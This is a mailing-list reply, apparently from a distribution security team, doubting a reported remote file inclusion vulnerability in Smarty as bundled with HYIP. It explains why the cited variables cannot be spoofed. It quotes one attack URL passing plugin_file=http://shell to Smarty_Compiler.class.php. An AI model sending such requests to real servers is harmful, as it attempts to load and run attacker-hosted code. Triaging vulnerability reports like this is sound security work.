Hi Thomas! Have you managed to reproduce this, even with Smarty in webroot and register_globals enabled? Your report mentions _get_plugin_filepath, but that does seem to be a different vector that one described in the original report. $type and $name can not be spoofed with register_globals, as those are function arguments. Moreover, in most cases where _get_plugin_filepath is called, both arguments are fixed strings or values read from the (trusted) file.
Reported attack vector is: Smarty_Compiler.class.php?plugin_file=http://shell However, $plugin_file is always initialized before use in Smarty_Compiler.class.php. Is the original report bogus or does HYIP use some old or customized Smarty version? (Well, I guess you don't know the real answer to this, just like me ;). -- Tomas Hoger -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]